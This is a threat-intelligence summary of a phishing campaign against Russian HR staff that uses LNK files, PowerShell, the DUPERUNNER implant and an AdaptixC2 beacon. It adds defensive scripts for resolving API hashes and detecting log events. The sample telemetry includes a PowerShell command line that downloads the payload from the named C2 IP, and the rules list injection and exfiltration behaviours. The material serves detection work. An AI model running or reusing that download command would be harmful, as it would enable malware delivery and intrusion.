Full Report
Contents: Introduction; Key Targets; Industries Affected; Geographical Focus; Infection Chain; Initial Findings; Looking into the decoy document; Technical Analysis; Stage 1 – Malicious LNK Script; Stage 2 – DUPERUNNER Implant; Stage 3 – AdaptixC2 Beacon; Infrastructural Artefacts; Conclusion; SEQRITE Protection; IOCs; MITRE ATT&CK.

Introduction: SEQRITE APT-Team have recently uncovered a campaign, which has been targeting Russian […]

Source: The post "Operation DupeHike: UNG0902 targets Russian employees with DUPERUNNER and AdaptixC2" appeared first on Blogs on Information Technology, Network & Cybersecurity | Seqrite.
Analysis Summary
# Threat Actor: UNG0902
## Attribution & Identity
The threat actor responsible for this campaign is identified internally by SEQRITE APT-Team as **UNG0902**. No further external attribution or known aliases are mentioned in the provided context, aside from this internal designation.
## Activity Summary
The campaign, dubbed **Operation DupeHike**, recently targeted Russian corporate entities. The operation revolves around spear-phishing using malicious archives (ZIP files) containing decoy documents themed around sensitive internal matters (employee bonuses and financial policies) to achieve initial compromise. The actor successfully deployed a newly observed implant, tracked as **DUPERUNNER**, which subsequently loaded the **AdaptixC2 Beacon**. The operation was active as of November 21, 2025.
## Tactics, Techniques & Procedures
The actor uses a multi-stage infection chain:
* **Initial Access/Execution:** Malicious LNK files disguised as PDF documents, delivered inside ZIP archives. Opening the LNK file launches PowerShell (`powershell.exe`), which carries out the next stage.
* **Defense Evasion / Masquerading:**
    * LNK file masquerading as a PDF (`.pdf.lnk`).
    * DLL posing as a ZIP.
    * `fontawesome.woff` masquerading as a font file.
    * AdaptixC2 uses packed shellcode appended behind magic bytes (`EZ`). (T1036, T1027)
    * AdaptixC2 resolves APIs using djb2-style hashing and PEB traversal. (T1027.007)
* **Execution & Persistence (DUPERUNNER):**
    * Downloads secondary stages using `powershell.exe` and `Invoke-WebRequest` (`iwr`). (T1059.001)
    * Process Injection: injects shellcode into legitimate running processes such as `explorer.exe`, `notepad.exe`, and `msedge.exe` via Remote Thread Injection. (T1055, T1055.003)
    * Reflective Code Loading: the AdaptixC2 payload is loaded reflectively from the appended shellcode. (T1620)
* **Discovery:** Gathers system information (hostname, domain, system time, Temp directory) and enumerates active processes. (T1082, T1057)
* **Command & Control (AdaptixC2):**
    * Uses HTTP GET for the initial download from the C2 server (IP 46.149.71.230). (T1071.001)
    * Communications are encoded via internal routines and use encryption. (T1132, T1573)
    * Potential use of raw TCP for beaconing. (T1095)
    * Exfiltration occurs via POST requests to the `/result` endpoint. (T1041)
* **Collection & Impact:** Capable of retrieving system files and exfiltrating stolen data from the victims' environments. (T1113, T1005, T1537)
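The djb2-style API hashing noted under Defense Evasion is the kind of detail an analyst resolves with a precomputed lookup table. The following is an added example, not code from the report or from the malware: it hashes candidate API names under the classic djb2 variant and its xor variant and maps hash constants found in a sample back to names. The seed, variant, case handling and the API name list are all assumptions to be adjusted once the sample's own routine has been read.

```python
# Classic djb2 (seed 5381, h = h*33 + c) and its xor variant, truncated to 32 bits.
# The report only says "djb2-style", so seed, variant and case handling are assumptions
# to adjust once the sample's routine has been read.
SEED = 5381
MASK = 0xFFFFFFFF

def djb2(name, xor=False):
    """Hash an ASCII API name the way djb2-style resolvers usually do (case-sensitive)."""
    h = SEED
    for c in name.encode("ascii"):
        h = ((h << 5) + h) & MASK          # h * 33
        h = ((h ^ c) if xor else (h + c)) & MASK
    return h

# Constructed candidate list (the report names no specific imports); extend it from the
# export tables of the DLLs the loader walks via the PEB.
API_NAMES = ["LoadLibraryA", "GetProcAddress", "VirtualAllocEx", "WriteProcessMemory",
             "CreateRemoteThread", "OpenProcess", "VirtualProtect", "GetModuleHandleA"]

def build_table(names=API_NAMES):
    """Map every hash under both variants back to (name, variant)."""
    table = {}
    for n in names:
        table[djb2(n)] = (n, "add")
        table[djb2(n, xor=True)] = (n, "xor")
    return table

def resolve(h, table=None):
    """Label a hash constant pulled from the binary; None means the name list or variant needs adjusting."""
    return (table or build_table()).get(h & MASK)
```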
## Targeting
* **Sectors:** Corporate Sector (General), specifically targeting **Human Resources & Payroll** departments.
* **Geography:** **Russian Federation**.
* **Victims:** Russian corporate entities (though specific organization names are not detailed).
## Tools & Infrastructure
* **Malware families used:**
    * **DUPERUNNER:** The initial, previously unknown implant downloaded via PowerShell.
    * **AdaptixC2 Beacon:** The final-stage C2 beacon established by DUPERUNNER.
* **Infrastructure:**
    * C2 IP address observed: `46.149.71.230`
    * Artifacts used in download: `s.exe` (DUPERUNNER) and `fontawesome.woff` (AdaptixC2 stager/payload).
    * Initial delivery file name observed: `Премия 2025.zip` (Bonus 2025.zip).
    * LNK file name observed: `Документ_1_О_размере_годовой_премии.pdf.lnk` (`Document_1_On_the_size_of_the_annual_bonus.pdf.lnk`).
## Implications
UNG0902 demonstrates a sophisticated, multi-stage infection chain leveraging multi-layered defense evasion techniques (masquerading, injection, reflective loading) to deploy custom malware (DUPERUNNER and AdaptixC2) targeting sensitive internal corporate functions (HR/Payroll) within Russia. The focus on specific, high-value internal documents suggests an objective of gaining persistent access and extracting sensitive organizational or financial data.
## Mitigations
Defense should focus on:
1. **Email/Phishing Controls:** Thorough analysis of inbound ZIP archives and LNK files, especially those referencing administrative or financial lures.
2. **PowerShell Logging and Analysis:** Monitor for suspicious PowerShell execution that spawns network connections or file downloads (T1059.001).
3. **Process Monitoring:** Implement controls to detect and block **Process Injection** into legitimate processes like `explorer.exe`, `notepad.exe`, and `msedge.exe` (T1055).
4. **Application Control:** Restrict the execution of unknown or newly downloaded `.exe` files.
5. **Network Detection:** Identify beaconing activity characteristic of HTTP/Encrypted communications originating from compromised hosts to suspicious external IPs (e.g., 46.149.71.230).
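The mitigations above map onto a handful of host and network events. As an added example (not code from the report or from SEQRITE), the script below runs those checks over a few constructed key=value log lines, using only the indicators the summary gives (the `.pdf.lnk` double extension, `iwr` in a PowerShell command line, remote threads into `explorer.exe`/`notepad.exe`/`msedge.exe`, and traffic to 46.149.71.230 or POST `/result`), then reports hosts on which several stages fired together. The log format and field names are assumptions.

```python
import re
# Indicators from the report summary above; the key=value log format is an assumption
C2_IP = "46.149.71.230"
INJECTION_TARGETS = {"explorer.exe", "notepad.exe", "msedge.exe"}
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample telemetry (not real logs from the campaign); WS02 is benign noise
SAMPLE_LOG = r'''
event=file_create host=WS01 path="C:\Users\ivan\Downloads\Премия 2025\Документ_1_О_размере_годовой_премии.pdf.lnk"
event=process_create host=WS01 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe iwr http://46.149.71.230/s.exe -OutFile $env:TEMP\s.exe"
event=process_create host=WS02 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe Get-Date"
event=create_remote_thread host=WS01 source=C:\Users\ivan\AppData\Local\Temp\s.exe target=C:\Windows\explorer.exe
event=network_connect host=WS01 image=C:\Windows\explorer.exe dest_ip=46.149.71.230 dest_port=80
event=http_request host=WS01 method=POST url=http://46.149.71.230/result
event=network_connect host=WS02 image="C:\Program Files\Mozilla Firefox\firefox.exe" dest_ip=198.51.100.7 dest_port=443
'''
def parse(line):
    """One key=value line -> dict; quoted values may contain spaces (Cyrillic paths included)."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3) for m in KV.finditer(line)}
def basename(path):
    return path.rsplit("\\", 1)[-1].lower()
# (rule name, MITRE technique cited in the report, predicate over a parsed event)
RULES = [
    ("lnk_masquerading_as_pdf", "T1036",
     lambda e: e.get("event") == "file_create" and e.get("path", "").lower().endswith(".pdf.lnk")),
    ("powershell_iwr_download", "T1059.001",
     lambda e: e.get("event") == "process_create" and basename(e.get("image", "")) == "powershell.exe"
     and re.search(r"\b(iwr|invoke-webrequest)\b", e.get("cmdline", ""), re.I) is not None),
    ("remote_thread_into_trusted_process", "T1055.003",
     lambda e: e.get("event") == "create_remote_thread" and basename(e.get("target", "")) in INJECTION_TARGETS),
    ("dupehike_c2_traffic", "T1071.001/T1041",
     lambda e: (e.get("event") == "network_connect" and e.get("dest_ip") == C2_IP)
     or (e.get("event") == "http_request" and e.get("method") == "POST" and e.get("url", "").endswith("/result"))),
]

def scan(log_text):
    """Return (host, rule name, technique) for every log line that matches a rule."""
    hits = []
    for line in log_text.strip().splitlines():
        e = parse(line)
        hits.extend((e.get("host"), name, tid) for name, tid, pred in RULES if pred(e))
    return hits

def hosts_with_chain(hits, min_stages=3):
    """Hosts where at least min_stages distinct rules fired: the whole chain, not one noisy event."""
    per_host = {}
    for host, name, _ in hits:
        per_host.setdefault(host, set()).add(name)
    return sorted(h for h, names in per_host.items() if len(names) >= min_stages)
```

`scan(SAMPLE_LOG)` flags only the WS01 lines, and `hosts_with_chain` reports WS01 as the host showing the full chain while the single benign PowerShell run on WS02 stays quiet.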